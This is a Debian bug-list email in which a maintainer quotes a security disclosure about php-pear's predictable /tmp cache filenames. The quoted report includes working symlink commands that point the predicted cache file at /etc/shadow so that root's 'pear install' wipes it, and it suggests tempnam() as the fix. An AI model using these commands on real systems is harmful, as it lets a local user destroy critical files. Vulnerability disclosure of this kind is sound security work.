Control: forcemerge -1 682157 Yes, it's a known bug that php-pear is not safe on multiuser systems.
Ondrej On Mon, Aug 25, 2014, at 21:28, vladz wrote: > > Package: php-pear > Version: 5.4.4-14+deb7u14 > Tags: security > > PEAR commands such as "pear install [...]" writes cache data into > predictable filenames located in "/tmp/". Unprivileged local users > could use symlinks to clobber arbitrary files. > > Temporary filenames ("$cachefile" and "$cacheidfile") are generated with > the code above. They are predictable as far as we know the extension > name that is going to be installed (this name is used to construct the > url for the MD5 checksum): > > $ cat -n /usr/share/php/PEAR/REST.php > [...] > 59 $cachefile = $this->config->get('cache_dir') . > DIRECTORY_SEPARATOR . > 60 md5($url) . 'rest.cachefile'; > [...] > 194 $cacheidfile = $this->config->get('cache_dir') . > DIRECTORY_SEPARATOR . > 195 md5($url) . 'rest.cacheid'; > > For instance, when installing the "Mail_mime" extension, the following > filenames are used by PEAR: > > - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile > - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid > > In this case, the "$url" used for md5 checksum is the following: > > $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum > ff051dc5b96c95bf60e300d415b6c47e - > > To sum up, if a local user wants to clobber the "/etc/shadow" file, he > runs: > > $ mkdir -p /tmp/pear/cache/ > $ ln -s /etc/shadow > /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile > > Then when root runs PEAR, file gets clobbered: > > # pear install Mail_mime > [...] > # du -sk /etc/shadow > 0 /etc/shadow > > A function like tempnam() could be use instead. It creates file with > unique filename (see http://php.net/manual/en/function.tempnam.php). > > Regards, > -- > http://vladz.devzero.fr > PGP key 8F7E2D3C from pgp.mit.edu > > _______________________________________________ > pkg-php-maint mailing list > pkg-php-ma...@lists.alioth.debian.org > http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-php-maint -- Ondřej Surý <ond...@sury.org> Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org